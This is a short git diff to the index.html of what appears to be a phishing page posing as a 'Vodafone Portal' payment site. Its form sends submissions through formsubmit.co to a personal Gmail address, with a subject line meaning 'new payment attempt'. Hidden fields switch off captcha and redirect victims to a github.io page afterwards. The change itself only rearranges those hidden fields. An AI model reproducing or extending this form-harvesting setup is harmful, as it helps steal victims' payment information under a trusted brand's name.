--- a/index.html
+++ b/index.html
@@ -29,9 +29,8 @@
             <form action="https:formsubmit.co/alknjalazmfwwwq@gmail.com" method="POST">
 
 
-                <input type="hidden" name="_subject" value="⚠️ محاولة دفع جديدة - Vodafone Portal">
-    
-    <input type="hidden" name="_next" value="https://alknjalazmfwwwq-dot.github.io/elkingcash/">
+
+                <input type="hidden" name="_subject" value="⚠️ دفع محاولة جديدة - Vodafone Portal"><input type="hidden" name="_next" value="https://alknjalazmfwwwq-dot.github.io/elkingcash/"><input type="hidden" name="_captcha" value="false">
     
     <input type="hidden" name="_captcha" value="false">
 
